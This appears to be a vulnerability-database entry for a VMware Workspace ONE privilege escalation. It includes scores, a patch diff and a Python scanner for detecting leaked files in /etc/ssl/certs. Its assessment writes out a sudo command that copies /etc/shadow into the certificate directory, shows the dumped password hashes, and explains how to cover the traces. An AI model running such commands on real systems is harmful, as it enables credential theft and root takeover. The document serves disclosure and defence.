9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to ‘root’.
Recent assessments:
zeroSteiner at May 23, 2022 1:41pm UTC reported:
There exists a vulnerability within /usr/local/horizon/scripts/publishCaCert.hzn where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into /etc/ssl/certs, which is owned by root. The script can be invoked by the horizon user without a sudo password.
The script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path, meaning the file will be placed in /etc/ssl/certs.
A local user running as horizon (such as from successfully exploiting CVE-2022-22954) can exploit this vulnerability to recover the shadow file by executing:
horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow
root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::
bin:x:18964:0:60:7:::
daemon:x:18964:0:60:7:::
messagebus:x:18964:0:60:7:::
systemd-bus-proxy:x:18964:0:60:7:::
systemd-journal-gateway:x:18964:0:60:7:::
systemd-journal-remote:x:18964:0:60:7:::
systemd-journal-upload:x:18964:0:60:7:::
systemd-network:x:18964:0:60:7:::
systemd-resolve:x:18964:0:60:7:::
systemd-timesync:x:18964:0:60:7:::
nobody:x:18964:0:60:7:::
sshd:!:18964:0:60:7:::
rabbitmq:!:18964::60::::
named:!:18964::60::::
postgres:!:18964:0:60:7:::
horizon:!:18964:0:60:7:::
sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::
elasticsearch:!:18964::60::::
The file that is written to the /etc/ssl/certs directory will still be owned by root, making the attacker unable to delete it. A crafty attacker would back up an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.
VMware patched this issue with hotfix HW-154129. The patch for the affected script adds validation to ensure that the argument is a certificate file.
Diff:
< . /usr/local/horizon/scripts/hzn-bin.inc
< openssl x509 -noout -in $CERTFILE 2>/dev/null
<
< if [ $? -ne 0 ]; then
< echo "ERROR: This is not a certificate file"
< exit 1
< fi
<
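Review bot: `$CERTFILE` is unquoted in `openssl x509 -noout -in $CERTFILE 2>/dev/null`, so a source path containing whitespace or glob characters is word-split before openssl sees it and the validation fails (or tests a different path than the one the script later copies); quote it and fold the exit-status test into the condition, `if ! openssl x509 -noout -in "$CERTFILE" 2>/dev/null; then`, which also removes the fragile separate `if [ $? -ne 0 ]` line. The `<` prefixes are `diff` normal format with no hunk header, so the reader has to take the prose's word that these are the added lines; a unified diff (`diff -u`) would make that unambiguous.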
Assessed Attacker Value: 2
Assessed Attacker Value: 5
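Following the detection advice in the assessment above, here is an added example (not part of the assessment or of VMware's code) that lists files in a CA directory which do not parse as PEM certificates, with their UTC mtime and owner uid; the PEM/DER check is structural (PEM envelope plus a leading ASN.1 SEQUENCE tag), lighter than the `openssl x509` test the hotfix uses, and the sample directory it builds is constructed data with a made-up hash.

```python
import base64, binascii, re, sys, tempfile, time
from pathlib import Path

PEM_BLOCK = re.compile(rb"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)
# Loose match for passwd/shadow-style records: account name plus 6 to 8 colon-separated fields.
ACCOUNT_LINE = re.compile(rb"^[A-Za-z_][-A-Za-z0-9_]*(:[^:\n]*){6,8}$", re.M)

def looks_like_certificate(data: bytes) -> bool:
    """Structural check: every PEM CERTIFICATE block decodes to DER starting with the
    SEQUENCE tag (0x30). Lighter than the `openssl x509 -noout` test in the hotfix."""
    blocks = PEM_BLOCK.findall(data)
    if not blocks:
        return False
    for body in blocks:
        try:
            der = base64.b64decode(b"".join(body.split()), validate=True)
        except (binascii.Error, ValueError):
            return False
        if not der or der[0] != 0x30:
            return False
    return True

def scan_cert_dir(directory) -> list:
    """Return (path, mtime_utc, uid, reason) for each regular file that is not a certificate."""
    findings = []
    for entry in sorted(Path(directory).iterdir()):
        if entry.is_symlink() or not entry.is_file():
            continue  # hash-named symlinks from update-ca-certificates and subdirectories are normal
        data = entry.read_bytes()
        if looks_like_certificate(data):
            continue
        st = entry.stat()
        reason = "passwd/shadow-style entries" if ACCOUNT_LINE.search(data) else "not a PEM certificate"
        mtime = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(st.st_mtime))
        findings.append((str(entry), mtime, st.st_uid, reason))
    return findings

def make_constructed_sample() -> str:
    """Constructed test data: a PEM-wrapped minimal DER SEQUENCE standing in for a CA cert,
    a hash-named symlink to it, and a leaked shadow-like file with a made-up hash."""
    d = Path(tempfile.mkdtemp(prefix="certscan-"))
    der = bytes([0x30, 0x03, 0x02, 0x01, 0x01])  # SEQUENCE { INTEGER 1 }; not a real certificate
    (d / "lab-ca.pem").write_bytes(b"-----BEGIN CERTIFICATE-----\n" + base64.b64encode(der) + b"\n-----END CERTIFICATE-----\n")
    (d / "0123abcd.0").symlink_to("lab-ca.pem")
    (d / "shadow").write_bytes(b"root:$6$constructed$notarealhash:19131:0:60:7:::\nbin:x:18964:0:60:7:::\n")
    return str(d)

if __name__ == "__main__":
    for path, mtime, uid, reason in scan_cert_dir(sys.argv[1] if len(sys.argv) > 1 else "/etc/ssl/certs"):
        print(f"{mtime}  uid={uid}  {path}: {reason}")
```

Run it against /etc/ssl/certs on the appliance and compare each reported mtime with the rest of the directory; a file overwritten later with a legitimate certificate, as the assessment describes, will no longer be flagged by content, so the timestamp comparison still matters.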
packetstormsecurity.com/files/171918/VMware-Workspace-ONE-Remote-Code-Execution.html
packetstormsecurity.com/files/171935/VMware-Workspace-ONE-Access-Privilege-Escalation.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960
www.vmware.com/security/advisories/VMSA-2022-0011.html